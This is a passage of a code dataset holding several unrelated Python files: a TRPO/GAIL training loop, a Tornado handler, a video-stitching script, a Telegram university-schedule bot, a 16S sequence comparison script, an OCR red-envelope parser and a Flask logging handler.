tf.train.Saver(self.discriminator.discriminate.weights)\n\n latent_sequence_prob_np, latent_sequence_np = self.run_clonos(expert_observations, init_latent=[1., 0., 0., 0., 0.])\n latent_sequence_np = latent_sequence_np.tolist()\n latent_sequence_prob_np = latent_sequence_prob_np.tolist()\n\n print('Batches,Episodes,Surrogate,Reward,Env Reward')\n for mini_batch in range(self.mini_batches+1):\n\n # expert_observations_batch, expert_actions_batch = self.replay_buffer.get_batch(self.mini_batch_size)\n expert_observations_batch = expert_observations\n expert_actions_batch = expert_actions\n\n batch_observations_lat, batch_observations, batch_actions, batch_total_env_rewards = self.rollout(mini_batch, latent_sequence_np)\n\n flat_actions = [a for actions in batch_actions for a in actions]\n flat_observations = [o for observations in batch_observations_lat for o in observations]\n\n flat_actions = np.asarray(flat_actions, dtype=np.float64)\n 
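# --- Editor's sketch: discount() used throughout this file is imported from utils,
# which is not included in this record. A standard implementation of the reverse
# discounted cumulative sum it performs (rewards-to-go, and GAE when called with
# gamma * lamda) would be:
import numpy as np

def discount(rewards, gamma):
    # out[t] = rewards[t] + gamma * out[t + 1], computed right to left
    out = np.zeros(len(rewards), dtype=np.float64)
    running = 0.0
    for t in reversed(range(len(rewards))):
        running = rewards[t] + gamma * running
        out[t] = running
    return out

# discount([1.0, 1.0, 1.0], 0.9) -> [2.71, 1.9, 1.0]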
flat_observations = np.asarray(flat_observations, dtype=np.float64)\n print('len:', len(flat_observations))\n flat_observations2 = flat_observations[:, :15]#4, 10, 15\n\n if mini_batch < self.mini_batches:\n d_loss_before_train, discriminator_loss = self.discriminator.train(expert_observations_batch, expert_actions_batch,\n flat_observations2[:self.mini_batch_size],\n flat_actions[:self.mini_batch_size])\n else:\n print('discriminator train not')\n\n batch_total_rewards = []\n batch_discounted_rewards_to_go = []\n batch_advantages = []\n total_reward = 0\n global d\n d = 0\n counters = 0\n index_rew = 0\n index_rew2 = 0\n for (observations, actions, obs_lat) in zip(batch_observations, batch_actions, batch_observations_lat):\n counters += len(observations)\n rewards_q, argmax_q = self.predict(np.asarray(obs_lat))\n # print('len:', len(rewards_q))\n # argmax_q = [np.argmax(i) for i in rewards_q]\n rewards_q = np.asarray(rewards_q)\n # print('rewards_q: \\n', rewards_q)\n # print('argmax:', argmax_q)\n # print('len_argmax:', len(argmax_q))\n\n argmax_q2 = []\n for reward_q, i in zip(rewards_q, argmax_q):\n element = reward_q[i]\n argmax_q2.append(element)\n\n # print('argmax2:', argmax_q2)\n # print('len_argmax2:', len(argmax_q2))\n\n rewards_log = [np.log(i) for i in argmax_q2]\n # print('rewards_log:', rewards_log)\n # print('len_rew_log:', len(rewards_log))\n\n rewards_q2 = np.asarray([[i * 0.01] for i in rewards_log])\n #print('rewards_q:', rewards_q2)\n # print('len_rew_q:', len(rewards_q2))\n\n reward_t = -self.discriminator.predict(np.array(observations), np.array(actions))\n #print('rewards_t:', reward_t)\n # print('len_rew_t:', len(reward_t))\n # reward_t = [[i+t for i,t in zip(y, e)] for (y, e) in zip(reward_t, rewards_q2)]\n # print('reward_t_len:', len(reward_t), 'reward_q_len:', len(rewards_q2))\n # reward_t = reward_t + rewards_q2\n # print('reward_t_len:', len(reward_t))\n\n\n reward_t = np.asarray([i + j for i, j in zip(reward_t, rewards_q2)])\n #reward_t = [(sum(i,j)).tolist() for i,j in zip(reward_t, rewards_q2)]\n\n #print('rewards_t-after:', reward_t, '\\n, type:', type(reward_t))\n #print('rewards_t-after:', reward_t)\n\n total_reward += np.sum(reward_t)\n batch_total_rewards.append(total_reward)\n reward_t = (reward_t.flatten())\n #print('flatten:', reward_t)\n discount_r = discount(reward_t, self.gamma)\n #print('discount:', discount_r)\n batch_discounted_rewards_to_go.extend(discount_r)\n obs_episode_np = np.array(observations)\n v = np.array(self.critic.predict(obs_episode_np)).flatten()\n v_next = shift(v, -1, cval=0)\n undiscounted_advantages = reward_t + self.gamma * v_next - v\n #print('undiscount:', undiscounted_advantages)\n\n discounted_advantages = discount(undiscounted_advantages, self.gamma * self.lamda)\n\n batch_advantages.extend(discounted_advantages)\n\n discounted_rewards_to_go_np = np.array(batch_discounted_rewards_to_go)\n discounted_rewards_to_go_np.resize((self.mini_batch_size, 1))\n\n observations_np = np.array(flat_observations2, dtype=np.float64) #10\n observations_np2 = np.array(flat_observations, dtype=np.float64) #13\n observations_np.resize((self.mini_batch_size, self.observation_dimensions))\n observations_np2.resize((self.mini_batch_size, self.observation_dimensions + self.latent_dimensions))\n\n advantages_np = np.array(batch_advantages)\n advantages_np.resize((self.mini_batch_size,))\n\n actions_np = np.array(flat_actions, dtype=np.float64).flatten()\n actions_np.resize((self.mini_batch_size, self.action_dimensions))\n\n 
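# --- Editor's sketch: conjugate_gradient() used just below also comes from utils
# (not shown). The standard TRPO variant solves H x = g given only a
# Hessian-vector product, which is exactly what __fisher_vector_product supplies;
# the signature mirrors the call site conjugate_gradient(fvp, g, feed):
import numpy as np

def conjugate_gradient(fvp, g, feed, iters=10, tol=1e-10):
    x = np.zeros_like(g)
    r = g.copy()   # residual g - H x (x starts at zero)
    p = r.copy()   # current search direction
    r_dot = r.dot(r)
    for _ in range(iters):
        hp = fvp(p, feed)              # H p via the fisher-vector product
        alpha = r_dot / p.dot(hp)
        x += alpha * p
        r -= alpha * hp
        new_r_dot = r.dot(r)
        if new_r_dot < tol:
            break
        p = r + (new_r_dot / r_dot) * p
        r_dot = new_r_dot
    return x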
self.critic.train(observations_np, discounted_rewards_to_go_np)\n feed = {self.x: observations_np2,\n self.actions_ph: actions_np,\n self.advantages_ph: advantages_np,\n self.old_log_prob_ph: self.sess.run([self.log_prob], feed_dict={self.x: observations_np2, self.actions_ph: actions_np})\n }\n\n g = np.array(self.sess.run([self.flat_grad],feed_dict=feed)[0],dtype=np.float64)\n step_dir = conjugate_gradient(self.__fisher_vector_product, g, feed)\n fvp = self.__fisher_vector_product(step_dir, feed)\n shs = step_dir.dot(fvp)\n assert shs > 0\n fullstep = np.sqrt(2 * self.max_kl / shs) * step_dir\n\n def loss_f(theta, mu_old):\n \"\"\"\n Computes surrogate and KL of weights theta, used in\n line search.\n :param theta: Weights.\n :param mu_old: Distribution of old weights.\n :return: Vector [surrogate,KL]\n \"\"\"\n feed[self.theta_ph] = theta\n feed[self.mu_old_ph] = mu_old\n self.sess.run([self.sff], feed_dict=feed)\n return self.sess.run(self.losses, feed_dict=feed)\n\n surrogate_run = self.sess.run(self.surrogate, feed_dict=feed)\n\n mu_old_run = self.sess.run(self.logits, feed_dict={self.x: observations_np2})\n theta_run = np.array(self.sess.run([self.flat_vars], feed_dict={})[0], dtype=np.float64)\n\n theta_new, surrogate_run = line_search(loss_f, theta_run,\n fullstep, mu_old_run,\n g.dot(step_dir),\n surrogate_run,\n self.max_kl)\n\n feed[self.theta_ph] = theta_new\n feed[self.step_direction] = step_dir\n _ = self.sess.run([self.sff], feed_dict=feed)\n if mini_batch % 10 == 0:\n _, summary = self.sess.run([self.step_direction, self.merged], feed_dict=feed)\n self.train_writer.add_summary(summary, mini_batch)\n\n self.episode_history.append(np.mean(batch_total_env_rewards))\n # mean = np.mean(self.episode_history)\n # if mean > max_mean:\n # max_mean = mean\n # saver.save(self.sess, myconfig['output_dir']+\"output/exp\"+str(myconfig['exp'])+\"model.ckpt\")\n\n print('{0},{1},{2},{3},{4},{5},{6}'.format(mini_batch, self.total_episodes,\n surrogate_run,np.mean(batch_total_rewards)\n ,np.mean(batch_total_env_rewards), d_loss_before_train, discriminator_loss))\n\n if mini_batch % 100 == 0:\n # encoder_saver.save(self.sess, myconfig['output_dir'] + \"output/exp\" + str(myconfig['exp']) + \"encoder_model.ckpt\", global_step=mini_batch)\n saver.save(self.sess, myconfig['output_dir'] + \"output/exp\" + str(myconfig['exp']) + \"model.ckpt\", global_step=mini_batch)\n discriminator_saver.save(self.discriminator.sess, myconfig['output_dir'] + \"output/exp\" + str(myconfig['exp']) + \"discriminator.ckpt\", global_step=mini_batch)\n\n # encoder_saver.save(self.sess, myconfig['output_dir'] + \"output/exp\" + str(myconfig['exp']) + \"encoder_model.ckpt\")\n saver.save(self.sess, myconfig['output_dir'] + \"output/exp\" + str(myconfig['exp']) + \"model.ckpt\")\n discriminator_saver.save(self.discriminator.sess, myconfig['output_dir'] + \"output/exp\" + str(myconfig['exp']) + \"discriminator.ckpt\")\n","sub_path":"Diplwmatikh projects/AircraftTrajectories_D_Info_GAIL/Dir_Info_GAIL/METAR/5modes/trpo.py","file_name":"trpo.py","file_ext":"py","file_size_in_byte":45589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"539709321","text":"import tornado.ioloop\nimport tornado.web\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n type='python'\n html=\"\"\"\n\n
\n        \n        \n        \"\"\" % type\n        self.write(html)\n\napplication = tornado.web.Application([\n    (r\"/\", MainHandler),\n])\n\nif __name__ == \"__main__\":\n    application.listen(9999)\n    tornado.ioloop.IOLoop.instance().start()\n","sub_path":"edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"538969599","text":"import sys\nimport argparse\nimport cv2\nfrom PIL import Image\nimport numpy as np\n\ndef getFrames():\n    frames = []\n    vidcap = cv2.VideoCapture('./test4.mp4')\n    success,image = vidcap.read()\n    fps = int(round(vidcap.get(cv2.CAP_PROP_FPS) / 4)) # a quarter of the frames per second (currently unused)\n    counter = 0\n    lastFrame = 0\n    total = 0\n    avg_counter = 0\n    while success:\n        success, image = vidcap.read()\n        if(success):\n            gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n            fm = cv2.Laplacian(gray, cv2.CV_64F).var()\n            total = total + fm\n            avg_counter = avg_counter + 1\n\n    vidcap = cv2.VideoCapture('./test4.mp4')\n    success,image = vidcap.read()\n    while success:\n        counter = counter + 1\n        frameId = int(round(vidcap.get(1))) #current frame number, rounded b/c sometimes you get frame intervals which aren't integers...this adds a little imprecision but is likely good enough\n        success, image = vidcap.read()\n        if(success):\n            gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n            fm = cv2.Laplacian(gray, cv2.CV_64F).var()\n            if(fm > (total/(avg_counter + (avg_counter *0.1))) and lastFrame + 4 < counter):\n                lastFrame = counter\n                print(\"added \" + str(frameId))\n                frames.append(image)\n\n    vidcap.release()\n    return frames\n\nprint(\"[INFO] Getting frames...\")\nimages = []\nfor frame in getFrames():\n    img = Image.fromarray(frame, 'RGB')\n    images.append(frame)\n\n# img.show()\nprint(\"[INFO] Stitching images...\")\nstitcher = cv2.Stitcher_create(1)\n\n(status, stitched) = stitcher.stitch(images)\n\nif status != 0:\n    print(\"[ERR] Can't stitch images, error code = %d\" % status)\n    sys.exit(-1)\n\nprint(\"[INFO] Writing new image...\")\ncv2.imwrite(\"./rcaefwa.jpg\", stitched)\nprint(\"[INFO] Done\")","sub_path":"documentation/demo_tools/video_stitching_tool/old.py","file_name":"old.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"503800041","text":"import requests\r\nfrom datetime import datetime\r\nfrom bs4 import BeautifulSoup\r\nimport telebot\r\n\r\n\r\naccess_token = \"ADD YOUR TOKEN HERE\"\r\ntelebot.apihelper.proxy = {'http':'http://10.10.1.10:3128'}\r\n\r\nbot = telebot.TeleBot(access_token)\r\n\r\nwork_days = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']\r\ndomain = \"http://www.ifmo.ru/ru/schedule/0/\"\r\n\r\ndef get_page(group: str, week=''):\r\n    if week:\r\n        week = str(week) + '/'\r\n    url = f'{domain}/{group}/{week}raspisanie_zanyatiy_{group}.htm'\r\n    response = requests.get(url)\r\n    web_page = response.text\r\n    return web_page\r\n\r\n\r\ndef parse_schedule_for_any_day(web_page, day):\r\n    soup = BeautifulSoup(web_page, \"html5lib\")\r\n\r\n    # Get the schedule table for the requested day\r\n    index = str(work_days.index(day) + 1)\r\n    index += \"day\"\r\n    schedule_table = soup.find(\"table\", attrs={\"id\": index})\r\n\r\n    # Class times\r\n    if schedule_table is None:\r\n        return None\r\n    times_list = schedule_table.find_all(\"td\", attrs={\"class\": \"time\"})\r\n    times_list = [times.span.text for times in times_list]\r\n\r\n    # Class locations\r\n    locations_list = 
schedule_table.find_all(\"td\", attrs={\"class\": \"room\"})\r\n    locations_list = [room.span.text for room in locations_list]\r\n\r\n    # Course names and lecturer names\r\n    lessons_list = schedule_table.find_all(\"td\", attrs={\"class\": \"lesson\"})\r\n    lessons_list = [lesson.text.split('\\n\\n') for lesson in lessons_list]\r\n    lessons_list = [', '.join([info for info in lesson_info if info]) for lesson_info in lessons_list]\r\n\r\n    return times_list, locations_list, lessons_list\r\n\r\n\r\n@bot.message_handler(commands=['monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday'])\r\ndef get_schedule(message):\r\n    \"\"\" Get the schedule for the given day \"\"\"\r\n    day, group = message.text.split()\r\n    web_page = get_page(group)\r\n    resp = ''\r\n    day = day[1].upper() + day[2:]\r\n    if parse_schedule_for_any_day(web_page, day) is None:\r\n        bot.send_message(message.chat.id, 'The system is currently unavailable. Please try back later.',\r\n                         parse_mode='HTML')\r\n        return None\r\n    times_lst, locations_lst, lessons_lst = \\\r\n        parse_schedule_for_any_day(web_page, day)\r\n    if times_lst:\r\n        for _time, location, lesson in zip(times_lst, locations_lst, lessons_lst):\r\n            resp += '{}, {}, {}\\n'.format(_time, location, lesson)\r\n        bot.send_message(message.chat.id, resp, parse_mode='HTML')\r\n    else:\r\n        bot.send_message(message.chat.id, 'No classes today, Trang')\r\n\r\n\r\n@bot.message_handler(commands=['near'])\r\ndef get_near_lesson(message):\r\n    \"\"\" Get the next upcoming lesson \"\"\"\r\n    _, group = message.text.split()\r\n    web_page = get_page(group)\r\n    today = datetime.now()\r\n    _date = today.weekday()\r\n    if _date != 6:\r\n        if parse_schedule_for_any_day(web_page, work_days[_date]) is None:\r\n            bot.send_message(message.chat.id, 'The system is currently unavailable. Please try back later.',\r\n                             parse_mode='HTML')\r\n            return None\r\n        times_lst, locations_lst, lessons_lst = \\\r\n            parse_schedule_for_any_day(web_page, work_days[_date])\r\n        for i in range(len(times_lst)):\r\n            t1 = times_lst[i][0:5]\r\n            t1 = datetime.strptime(t1, '%H:%M')\r\n            if today.time() < t1.time():\r\n                result = '{}, {}, {}\\n'.format(times_lst[i], locations_lst[i], lessons_lst[i])\r\n                bot.send_message(message.chat.id, result, parse_mode='HTML')\r\n                return None\r\n\r\n    if _date == 6:\r\n        _date = 0\r\n\r\n    for i in range(_date, 5):\r\n        if parse_schedule_for_any_day(web_page, work_days[_date]) is None:\r\n            bot.send_message(message.chat.id, 'The system is currently unavailable. 
Please try back later.',\r\n                             parse_mode='HTML')\r\n            break\r\n        times_lst, locations_lst, lessons_lst = \\\r\n            parse_schedule_for_any_day(web_page, work_days[_date])\r\n        if times_lst:\r\n            result = '{}, {}, {}\\n'.format(times_lst[0], locations_lst[0], lessons_lst[0])\r\n            bot.send_message(message.chat.id, result, parse_mode='HTML')\r\n            break\r\n\r\n\r\n@bot.message_handler(commands=['tomorrow'])\r\ndef get_tomorrow(message):\r\n    \"\"\" Get the schedule for the next day \"\"\"\r\n    _, group = message.text.split()\r\n    web_page = get_page(group)\r\n    tomorrow = datetime.now().weekday() + 1\r\n    resp = ''\r\n\r\n    if tomorrow == 6:\r\n        bot.send_message(message.chat.id, 'No classes tomorrow, Trang', parse_mode='HTML')\r\n        return None\r\n    if tomorrow == 7:\r\n        tomorrow = 0\r\n    times_lst, locations_lst, lessons_lst = \\\r\n        parse_schedule_for_any_day(web_page, work_days[tomorrow])\r\n    if times_lst:\r\n        for _time, location, lesson in zip(times_lst, locations_lst, lessons_lst):\r\n            resp += '{}, {}, {}\\n'.format(_time, location, lesson)\r\n        bot.send_message(message.chat.id, resp, parse_mode='HTML')\r\n    else:\r\n        bot.send_message(message.chat.id, 'No classes tomorrow, Trang', parse_mode='HTML')\r\n\r\n\r\n@bot.message_handler(commands=['all'])\r\ndef get_all_schedule(message):\r\n    \"\"\" Get the whole week's schedule for the given group \"\"\"\r\n    _, group = message.text.split()\r\n    web_page = get_page(group)\r\n    for day in work_days:\r\n        resp = ''\r\n        if parse_schedule_for_any_day(web_page, day) is None:\r\n            bot.send_message(message.chat.id, 'The system is currently unavailable. Please try back later.',\r\n                             parse_mode='HTML')\r\n            break\r\n        times_lst, locations_lst, lessons_lst = \\\r\n            parse_schedule_for_any_day(web_page, day)\r\n\r\n        if times_lst:\r\n            for _time, location, lesson in zip(times_lst, locations_lst, lessons_lst):\r\n                resp += '{}, {}, {}\\n'.format(_time, location, lesson)\r\n            bot.send_message(message.chat.id, resp, parse_mode='HTML')\r\n\r\n\r\nif __name__ == '__main__':\r\n    bot.polling()\r\n","sub_path":"homework05/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"505166479","text":"import pickle\nimport pandas as pd\nimport os\n\nPATH = os.path.join(os.path.dirname( __file__ ), 'pickle_data/')\n\n\ndef creat_and_dump_dataframe(data, category, client_id):\n    dics = None\n    if category == 'sales':\n        dics = [\n            {'Sales_id':row[0], \n            'Datetimestamp': row[1], \n            'Item_code': row[2], \n            'Item_name': row[3], \n            'Sale_quantity': float(row[4]),\n            'Unitcost_price': float(row[5]), \n            'Unitsale_price': float(row[6]), \n            'Total_sales': float(row[7])\n            } for row in data[1:]]\n    elif category == 'item':\n        dics = [\n            {'Item_code': row[0],\n            'Item_name': row[1],\n            'Category' : row[2],\n            'Sub_category':row[3] \n            } for row in data[1:]]\n    \n    df = pd.DataFrame(dics)\n    #print(df.dtypes)\n    df.to_pickle(PATH + f'{client_id}_{category}.pkl')\n\ndef read_dataframe_from_pickle(client_id, data_name):\n    df = pd.read_pickle(PATH + f'{client_id}_{data_name}.pkl')\n    return df\n\n    \n\ndef delete_client_pickle_files(client_id):\n    \n    files = [PATH+f'{client_id}_item2idx.pkl', \n            PATH+f'{client_id}_idx2item.pkl' , \n            PATH+f'{client_id}_code2name.pkl',\n            PATH+f'{client_id}_top20_items_on_sales.pkl',\n            PATH + f'{client_id}_sales.pkl',\n            PATH + f'{client_id}_item.pkl',\n            PATH + f'{client_id}_propeht_model.plk']\n    for fl in files:\n        if os.path.isfile(fl):\n            os.remove(fl)\n    return 
{'deleted_pickle':True}\n \n ","sub_path":"AAP/source/code/modules/retail/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"245263863","text":"import string\n\ngenus_name=\"listeria\"\n\n#for bool:\nsteady_within_genus_but_not_distinguished=\"#\"\nsteady_within_genus_and_distinguished=\"V\"\nresult_line_bool=\"\"\n\n#for count:\nnot_steady_position_within_genus=\"@\"\nresult_line_count=\"\"\n\n\ndef checkingIfSteadyWithinGenus(listeria_db):\n\tglobal position_steady_within_listeria\n\tglobal listeria_base\n\tglobal index_char\n\n\tposition_steady_within_listeria=True\n\tlisteria_base = listeria_db[0][index_char]\t\t\t# the base at this position in the first line of the listeria db\n\n\t#go over all the listeria lines:\n\tfor line in listeria_db :\n\t\tif line[index_char] != listeria_base:\n\t\t\tposition_steady_within_listeria = False\n\t\t\tbreak\n\t\t\t\t\ndef addResultAsBoolean(other_db):\n\tglobal result_line_bool\n\tglobal result_file\n\t\n\t#CALCULATING RESULTS\n\tdistinguished=True\n\tfor line in other_db :\n\t\tif line[index_char] == listeria_base:\n\t\t\tdistinguished = False\n\t\t\tbreak\n\t# PRINTING THE RESULTS TO RESULT STRING\n\tif distinguished:\t\t\n\t\t#CONSERVED:\n\t\t\n\t\t# result_file.write( listeria_base )\t\t#for debugging\n\t\tresult_line_bool += listeria_base\n\telse:\n\t\t# result_file.write( steady_within_genus_but_not_distinguished )\t\t#for debugging\n\t\tresult_line_bool += steady_within_genus_but_not_distinguished\n\t\t\n\t\t\t\n\t\t\t\t\ndef addResultAsCount(other_db):\n\tglobal result_line_count\n\tglobal result_file\n\t\n\t#CALCULATING RESULTS\n\tsame_as_listeria_count=0\n\tdifferent_from_listeria_count=0\n\tfor line in other_db:\n\t\tif line[index_char] == listeria_base:\n\t\t\tsame_as_listeria_count+=1\n\t\telse:\n\t\t\tdifferent_from_listeria_count+=1\n\t\t\t\n\t# PRINTING THE RESULTS TO RESULT STRING\n\t# result_file.write( same_as_listeria_count )\t\t#for debugging\n\tresult_line_count += str(same_as_listeria_count)+\"\\t\"\n\t\t\t\ndef steadyWithinGenus(other_db):\n\tglobal result_line_bool\n\tglobal result_line_count\n\n\t#if the position is consistent within the genus and is not '.'
: go over all of the other genera:\n\tif listeria_base != \".\" :\t\t\n\t\taddResultAsBoolean(other_db)\n\t\taddResultAsCount(other_db)\n\telse:\n\t\t# result_file.write( \".\" )\n\t\tresult_line_bool += \".\"\n\t\tresult_line_count += \".\\t\"\n\t\t\n\ndef NotSteadyWithinGenus():\n\tglobal result_line_bool\n\tglobal result_line_count\n\t\n\tresult_line_bool += not_steady_position_within_genus\n\tresult_line_count += not_steady_position_within_genus + \"\\t\"\n\n\ndef printingInfo():\n\t#IN BOOL\n\tresult_file.write( \"BOOL RESULTS:\\n\" )\n\tresult_file.write( \"positions that are not steady within the genus itself are symbolized by: \" + not_steady_position_within_genus + \"\\n\" )\n\tresult_file.write( \"conserved positions are symbolized by: \" + steady_within_genus_and_distinguished + \"\\n\" )\n\tresult_file.write( \"positions that are steady within the genus but not distinguished are symbolized by: \" + steady_within_genus_but_not_distinguished + \"\\n\" )\n\tresult_file.write( \"dots stand for a lack of base in that alignment\\n\" )\n\tresult_file.write( result_line_bool + \"\\n\" )\n\n\t\t\n\t\t\t\n\t#IN COUNT\n\tresult_file.write( \"COUNT RESULTS\\n\" )\n\tresult_file.write( \"Each number is the count of species that have the same base at that position \\n\" )\n\tresult_file.write( \"positions that are not steady within the genus itself are symbolized by: \" + not_steady_position_within_genus + \"\\n\" )\n\tresult_file.write( \"dots stand for a lack of base in that alignment\\n\" )\n\tresult_file.write( result_line_count )\n\t\n\t\n\t\n#\t****\t#\n#\tmain\t#\n#\t****\t#\n\nresult_file = open(r\"/cygdrive/s/HOME/Microbes/16sScriptsAfterAlignment/PerGenus/result__listeria3\", \"w\")\n\t\n# result_file = open(r\"/cygdrive/s/HOME/Microbs/16sScriptsAfterAlignment/PerGenus/result_listeria\", \"w\")\n\n\n\n\n\nlisteria_db = open(r\"aligned_listeria_strends_only\", \"r\").read().splitlines()\t\t#the aligned lines of listeria as a list of strings- every string is a line\nother_db= open(r\"aligned_all_but_listeria_strends_only3\", \"r\").read().splitlines()\t#the aligned lines of all but listeria as a list of strings- every string is a line\n# other_db= open(r\"aligned_all_but_listeria_strends_only\", \"r\").read().splitlines()\t#the aligned lines of all but listeria as a list of strings- every string is a line\n\n# count=0\n# for line in other_db:\n\t# count+=1\n\t# if len(line) != 7682:\n\t\t# print \"count \" + str(count) + \" len \" + str(len(line))\n\t\t\n\nfor index_char in range(0, len(listeria_db[0])):\t\t\n\tcheckingIfSteadyWithinGenus(listeria_db)\n\n\tif position_steady_within_listeria:\n\t\tsteadyWithinGenus(other_db)\n\telse:\n\t\tNotSteadyWithinGenus()\n\nprintingInfo()\n\nresult_file.close()\n\t","sub_path":"PerGenus/script_to_find_match.py","file_name":"script_to_find_match.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"91993848","text":"import os\nimport sys\nfrom contextlib import redirect_stdout, suppress, contextmanager\n\n\n################################################\n\n@contextmanager\ndef tag(name):\n print(\"<%s>\" % name)\n yield\n print(\"</%s>\" % name)\n\n\nwith tag(\"div\"):\n print(\"yay!\")\n\n\n\n#############################################################\n\n# we want to direct all the print statements to the log file\n#first try:\nwith open('log.txt', 'w') as log:\n oldstdout = sys.stdout\n sys.stdout = log\n try:\n print(\"here is the help for 
sys:\")\n help(sys)\n finally:\n sys.stdout = oldstdout\n\n# better:\nwith open('log.txt', 'w') as log:\n with redirect_stdout(log):\n print(\"here is the help for sys:\")\n help(sys)\n\n\n\n\n####################################################3\n\n\nwith suppress(FileNotFoundError):\n os.remove(\"foo\")\n\n\n\n","sub_path":"idiomatic/context-managers.py","file_name":"context-managers.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"382699723","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\nimport os\nimport re\nimport copy\nimport threading\nimport logging\nfrom decimal import Decimal\nfrom Images.bao.hongbao import HongBao\nfrom Images.bao.tools import get_continuous_same_list\nfrom Images.bao import yutu\n\nlogger = logging.getLogger(__name__)\n\n\nclass Images(object):\n def __init__(self, images_dir):\n self.images_dir = images_dir\n self.images_name = os.listdir(images_dir)\n # {'image_name1': [bao1, bao2], 'image_name2': [bao2, bao3], }\n self.hongbaos = {}\n # [bao1, bao2, bao3, bao4, bao2]\n self.hongbao_list = []\n # [\n # {\"images_names\": ['1.jpg', '2.jpg'], \"baos\":[]},\n # {\"images_names\": ['1.jpg', '2.jpg'], \"baos\":[]},\n # ]\n self.outdate_baos = []\n self.similar_image = []\n self.threads = []\n self.total = 0.0\n self.same_total = 0.0\n\n self.get_honbaos_from_images()\n self.get_same_image()\n self.calculate()\n\n @staticmethod\n def find_price(words):\n matches = re.findall(u\"-\\d+\\.{1,2}\\d{2}|\\+\\d+\\.{1,2}\\d{2}|\\d+\\.{1,2}\\d{2}元|-\\d+\\.{1,2}\\d{2}元\", words)\n if matches:\n return matches.pop()\n else:\n return None\n\n @staticmethod\n def float_words(words):\n matches = re.findall(u\"-\\d+\\.{1,2}\\d{2}\", words)\n if matches:\n return matches.pop()\n else:\n matches = re.findall(u\"\\d+\\.{1,2}\\d{2}\", words)\n if matches:\n return matches.pop()\n return None\n\n @staticmethod\n def find_date(words):\n matches = re.findall(u\"\\d{1,2}月\\d{1,2}日\\d{1,2}:\\d{1,2}|\\d{1,2}-\\d{1,2}\", words)\n if matches:\n return matches.pop()\n else:\n return None\n\n def get_hongbaos_from_one_image(self, image_name):\n image_path = os.path.join(self.images_dir, image_name)\n words_list = yutu.get_words_from_image(image_path)\n\n baos_in_image = []\n outdate_baos = []\n\n for index in range(len(words_list)):\n if self.find_price(words_list[index]):\n value = self.float_words(words_list[index])\n split_str = words_list[index].split(value)\n\n if split_str[0] != '' and split_str[0] != u'+':\n username = split_str[0]\n else:\n username = words_list[index-1]\n if username == u'拼':\n username = words_list[index-2]\n try:\n if self.find_date(words_list[index+1]):\n date = words_list[index+1]\n elif self.find_date(words_list[index+2]):\n date = words_list[index+2]\n else:\n date = None\n except IndexError:\n date = None\n hongbao = HongBao(username,\n Decimal(value.replace('..', '.')),\n date)\n\n if hongbao.value < 0:\n outdate_baos.append(hongbao)\n break\n else:\n baos_in_image.append(hongbao)\n if outdate_baos:\n self.outdate_baos.append({'image_name': image_name,\n 'baos': outdate_baos,\n 'sum':sum(bao.value for bao in outdate_baos)})\n\n self.hongbaos[image_name] = baos_in_image\n\n def get_honbaos_from_images(self):\n for image_name in self.images_name:\n th = threading.Thread(target=self.get_hongbaos_from_one_image,\n args=(image_name,))\n self.threads.append(th)\n\n for t in self.threads:\n t.start()\n\n for t in self.threads:\n t.join()\n\n self.threads = 
[]\n\n for image_name, hongbaos in self.hongbaos.items():\n self.hongbao_list += hongbaos\n logger.info('%s %s', image_name, sum([hongbao.value for hongbao in hongbaos]))\n\n def calculate(self):\n self.total = sum([bao.value for bao in self.hongbao_list])\n\n def get_same_image(self):\n for image_name, hongbaos in self.hongbaos.items():\n image_bao_copy = self.hongbaos.copy()\n image_bao_copy.pop(image_name)\n\n for copy_image_name, copy_baos in image_bao_copy.items():\n same_lists = get_continuous_same_list(hongbaos, copy_baos)\n if same_lists:\n sum_same_list = sum(item.value for item in same_lists)\n same_image = {\"images_names\": {image_name,\n copy_image_name},\n \"baos\": same_lists,\n \"sum\": sum_same_list}\n\n if self.similar_image:\n if same_lists in [similar['baos'] for similar in self.similar_image]:\n copy_similars = copy.deepcopy(self.similar_image)\n for index, similar in enumerate(copy_similars):\n if similar['baos'] == same_image['baos']:\n self.similar_image[index]['images_names'].update(same_image['images_names'])\n else:\n self.similar_image.append(same_image)\n else:\n self.similar_image.append(same_image)\n\n @property\n def similar_images_name(self):\n return [image['images_names'] for image in self.similar_image]\n\n","sub_path":"Images/bao/images_manager.py","file_name":"images_manager.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"438168128","text":"import logging\nimport time\nimport datetime\n\nfrom flask.logging import default_handler\n\nfrom tensai.models import db, Log\n\n\nclass TensaiLogger(logging.Handler):\n\n def __init__(self, level=logging.WARN):\n super().__init__(level)\n\n def emit(self, record):\n self.format(record)\n log = Log()\n struct_time = time.localtime(record.created)\n log.time_created = datetime.datetime(*struct_time[:6])\n log.level = record.levelname\n log.module = record.module\n log.funcname = record.funcName\n log.message = record.message\n log.stack = record.stack_info\n\n db.session.add(log)\n db.session.commit()\n\n\ndef register_loggers(app):\n if app.debug:\n app.logger.addHandler(logging.StreamHandler())\n app.logger.addHandler(TensaiLogger())\n 